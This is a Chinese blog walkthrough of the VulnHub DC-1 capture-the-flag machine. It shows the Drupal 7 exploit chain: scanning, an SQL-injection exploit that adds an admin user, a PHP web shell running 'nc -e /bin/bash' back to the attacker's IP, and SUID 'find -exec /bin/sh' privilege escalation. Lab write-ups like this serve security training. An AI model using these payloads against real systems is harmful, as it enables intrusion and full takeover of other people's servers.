【DC系列】DC-1靶机实战详细讲解

最新推荐文章于 2024-06-04 16:20:34 发布
最新推荐文章于 2024-06-04 16:20:34 发布
阅读量173 收藏 2
点赞数 1
分类专栏: 打靶机系列 文章标签: python linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/131421957
版权

【DC系列01】DC-1靶机

DC-1下载地址:https://www.five86.com/downloads/DC-1.zip

首先收集信息进行ip扫描

nmap -sS -T4 192.168.197.0/24

image-20230627145511103

打开后是这个样子

image-20230627145556711

看到一个登陆窗口,但是不能爆破,连续爆破超过5次会被禁止登陆。

image-20230627150423726

利用Wappalyzer可以看出来这个web用的是一个Drupal 7的内容管理系统,我们可以去找针对这个的扫描器。

image-20230627150307537

经过不懈的寻找,发现了这个扫描器(droopescan)。

进入这个网站后寻找安装方法,发现可以利用pip安装。

我们就在kali中pip install droopescan安装

image-20230627150705777

image-20230627155557092

我们扫出来的版本是7.22-7.26,就可以去searchsploit drupal查找漏洞文件

image-20230627155915705

查找了这么多,我用的是34992这个sql注入命令文件,然后searchsploit -m 34992下载就好了

image-20230627160429553

这样就可以在数据库中添加自己的账号密码

image-20230627160634860

账号密码都是tang就进去了

image-20230627160802611

这个时候我们想的就是怎么做一个反弹shell

这里我们发现了flag3,点进去看看。

image-20230627161742753

这里发现了需要用到find命令的-exec去读取shadow文件(密码存放文件,密文),所以这里想到了可能等会儿需要破解密码。

image-20230627161823451

点击Edit,我们发现这里的格式只能输入HTML或者纯文本,我们需要研究研究怎么上传php或者python代码。

image-20230627162148162

经过寻找,在这里面发现一个PHP fillter,安装后就可以上传php代码了

image-20230627161214837

安装好后发现还是不能上传php文本,所以又反过来找到了这个Permissions

image-20230627161551238

进去后有个Use the PHP code text format没有勾选,这里我们勾选上。

image-20230627161614058

这里我们就可以上传PHP代码了,可以上传个木马做一个反弹shell。

image-20230627163150781

<?php system('nc -e /bin/bash 192.168.197.160 8888');?>

image-20230627164009695
kali上设置一个监听,网页刷新下shell就过来了。

image-20230627164038443

利用python代码可以看着好看点,能显示目录。

python -c "import pty;pty.spawn('/bin/bash')"

image-20230627164635697

在flag3里面提到了find命令,可能关键点是find命令

sudo -l看一下,然并卵,什么都没有

image-20230627164838267

我们可以利用另一个命令,这条命令的作用是查找普通账户下拥有root权限的文件。

这里我们找到了/usr/bin/find

find / -perm -u=s -type f 2>/dev/null

image-20230627164930149

/usr/bin/find /etc/passwd -exec '/bin/sh' \;

find中的参数 -exec  执行找到的文件,find后面的/bin是什么都可以,但一定要是Linux中有的。

这里我们就可以利用下面命令进行提权,这里就有人说了,为什么不是bash,因为bash文件的权限不够。

image-20230627165537731

image-20230627165515360

接下来就可以轻松拿旗了

image-20230627172525224

dumplings。
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【Vulnhub靶机DC-1(suid find提权)
过期的秋刀鱼
08-03 422
Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。22、根据 flag4.txt 中的内容,推测下一步需要进行提权,从而获得 root 权限,并访问 /root 目录,获得 flag5。找到了与 http 相关的模块,根据 Rank(等级)优先选择带颜色的模块,使用。
DC-1渗透靶场实战速通版
saber的博客
12-01 884
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
【渗透测试】DC-1靶机实战(上)漏洞扫描获取反弹shell
最新发布
m0_74313947的博客
06-04 1202
靶机下载地址靶机界面渗透测试流程:1.范围界定2. 信息搜集3. 目标识别4. 服务枚举5. 漏洞映射6. 社会工程学7. 漏洞利用8. 权限提升9. 访问维护0. 文档报告。
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2903
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
DC-1靶机实战和分析
weixin_48202759的博客
08-31 931
前言 我们都知道,对靶机的渗透,可以宽阔自己的解题思路,练习并熟悉相关操作命令,提高自己的能力。下面我就对Vulnhub的DC-1靶机进行渗透,靶机设置了5个flag,咱们依次找到它。并通过图文形式讲解涉及到的相关知识点。DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 目标机IP地址:198.162.9.138 攻击机kali IP地址:198.132.9.129 目标探测 渗透测试的第一步,是信息收集,这一步很重要,关系到后面的渗透步骤。下面我们对
DC-1靶场
2301_76690905的博客
12-01 67
下载后解压成.ova格式,虚拟机上直接打开这个.ova就行,kali和靶机都调成NET模式因为攻击机和靶机同在局域网使用内网扫描:Nmap扫靶机ip:-v:该选项表示在扫描期间显示详细的输出信息,使您能够更好地了解扫描进度和结果。-A:这是一个组合选项,用于启用一系列高级扫描技术和功能,以便获得更全面的目标主机信息。-A 选项将同时启用以下子选项:主机发现(Host Discovery):尝试确定目标 IP 地址是否可达。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC-1靶场实战详解
热门推荐
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 173
DC-1详解
DC-1靶场渗透实验
Alashan12的博客
05-05 1925
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
靶机DC-3—WP
m0_66638011的博客
05-17 1269
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
DC-1靶机,初级渗透详细教程
2302_79546589的博客
11-24 1295
根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径是Sites/default/settings.php,我们可以用命令直接搜索并打开,内联执行。这个脚本是用php写的,而且还能用php加参数运行,直接得到加密后的密码,这里我们设置一个密码123。密码加密了,像登录就不太好登陆了,我们可以修改一下admin的密码。看到漏洞还是挺多的,我们用等级比较高,也比较新的18年的漏洞。find比较常用,可以执行root权限的命令找查文件,
DC系列靶机DC-1
weixin_53067829的博客
07-01 979
DC系列靶机
DC靶场系列--DC1
BGiscool的博客
06-28 4855
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC靶机1-9
qq_60905276的博客
01-22 4670
1.DC1 首先我们不知道靶机的ip地址,我们通过
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值